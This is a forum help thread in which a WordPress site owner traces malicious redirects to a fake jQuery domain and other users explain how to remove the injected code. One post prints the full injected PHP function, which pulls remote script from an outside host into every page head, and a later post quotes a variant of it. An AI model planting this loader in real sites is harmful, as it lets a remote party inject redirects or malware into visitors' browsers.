[Solved]

Viruses and worms
1

Hello,
i just started a new website few weeks ago, use wordpress + goodnews 3.4 theme. But yesterday when i clicked on a post “something” redirected me to this strange website: downloadmusicfreenow.com.
I cant figure out what can be infected… Please help me fix this.

Thank you!

2

Hi geryeo,

Can you provide the specific post you were on? Use hXtp:// instead of http://.

~!Donovan

3

Hi geryeo,

Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts site is given as a malvertiser, so that is likely what will be turned up…
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
Therev could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
info: [img] s.gravatar.com/js/
info: [decodingLevel=0] found JavaScript
suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline

polonus

4

@Donovan Sorry, I don’t remember that post…

But I found in the theme folder …/post.php this part of code which looks very strange: … jquerye.com/jquery-1.6.3.min.js
Shouldn’t there be jquery.com?

Is there any good malware scanner site where i can upload the theme (think there is the problem) and check it?

Thanks

5

Yes gereyo, that is malcode. !Donovan reported a similar case in another thread…jqueries was used there (plural), apparently they are variations on the same injected malcode theme,

polonus

6

Ok, so now i just need to delete that part with …jquerye.com/jquery-1.6.3.min.js… to solve it?

Thanks polonus

7

Hi geryeo,

You are welcome. Here what Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda

polonus

8

Just to leave this as a reference for all who have similar problem:

The code that I had in my wordpress website was inside the theme folder in a file called functions.init.php and it looked like that:

if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider ()
    {
        if (function_exists('curl_init')) {
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
add_action('wp_head', 'insert_jquery_slider');
}

If you ever happened to be in the same place, this is how to solve this:

Just search in all your files by text and look for “jquerye” or even better for “insert_jquery_slider” or any of the patters you see in the piece of code above. That should point you where you need! (hint: just remove the whole function)

9

Hi RamyNasr,

We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,

polonus

10

Hi, I don’t know if I’m a little late to post in here regarding this issue. I am having the same problem. I am trying to edit

<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

I just don’t know what part to take out exactly. When mentioned one person said to remove the function, I just need to know exactly what part of the code is the function, as I am totally new to this stuff…I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.

11

Everything that you posted is part of the function. Did you try removing the whole line?

Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?

~!Donovan